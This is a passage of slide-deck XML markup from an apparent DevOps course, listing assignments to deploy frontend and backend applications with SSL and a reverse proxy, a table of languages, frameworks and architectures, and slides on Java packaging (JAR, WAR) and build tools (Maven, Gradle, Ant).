                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploy a VueJs Application on live server with ssl and reverse proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploy a Angular Application on live server with ssl and reverse proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploy a NextJs Application on live server with ssl and reverse proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploy a NuxtJs Application on live server with ssl and reverse proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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367"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1629525"/>
            <a:ext cx="8520600" cy="2978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rgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploy a Java Application on live server with ssl and reverse proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploy a Python Application on live server with ssl and reverse proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploy a Ruby Application on live server with ssl and reverse proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploy a NodeJs Application on live server with ssl and reverse proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploy a PHP Application on live server with ssl and reverse proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2255" name="Google Shape;2255;p367"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="470950"/>
            <a:ext cx="8520600" cy="92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DevOps Deployment Assignments 2</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="3620">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="3620">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For Backend Applications </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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9" name="Shape 2259"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2260" name="Google Shape;2260;p368"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="472300" y="200750"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2662225"/>
                <a:gridCol w="2662225"/>
                <a:gridCol w="2662225"/>
              </a:tblGrid>
              <a:tr h="689825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Language</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Application Name</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>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Architecture Patterns</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="448350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Python</a:t>
                      </a:r>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3"/>
                        </a:rPr>
                        <a:t>Django</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Monolithic</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="431175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Python</a:t>
                      </a:r>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4"/>
                        </a:rPr>
                        <a:t>Flask</a:t>
                      </a:r>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Monolithic &amp; Microservice</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="431175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>NodeJs</a:t>
                      </a:r>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5"/>
                        </a:rPr>
                        <a:t>ExpressJs</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Monolithic</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="431175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>NodeJs</a:t>
                      </a:r>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6"/>
                        </a:rPr>
                        <a:t>MoleculerJs</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Microservice</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="431175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>NodeJs</a:t>
                      </a:r>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7"/>
                        </a:rPr>
                        <a:t>NestJs</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Microservice</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="431175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Java</a:t>
                      </a:r>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8"/>
                        </a:rPr>
                        <a:t>SpringBoot</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Microservice</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="431175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Java</a:t>
                      </a:r>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latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Spring Framework</a:t>
                      </a:r>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Monolithics</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="431175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>PHP</a:t>
                      </a:r>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10"/>
                        </a:rPr>
                        <a:t>Laravel</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Monolithic</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="431175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Ruby</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Ruby On Rails</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Monolithic</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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p369"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464100" y="2315325"/>
            <a:ext cx="8520600" cy="1554900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-412750" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JAR ( </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java ARchive </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-412750" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WAR ( </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Application Resource/ ARchive </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2266" name="Google Shape;2266;p369"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464100" y="1156750"/>
            <a:ext cx="8520600" cy="92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Java Application </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3620">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Packaging</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2271" name="Google Shape;2271;p370"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826300" y="1865550"/>
            <a:ext cx="4599900" cy="2585400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache Maven</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gradle</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache Ant</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
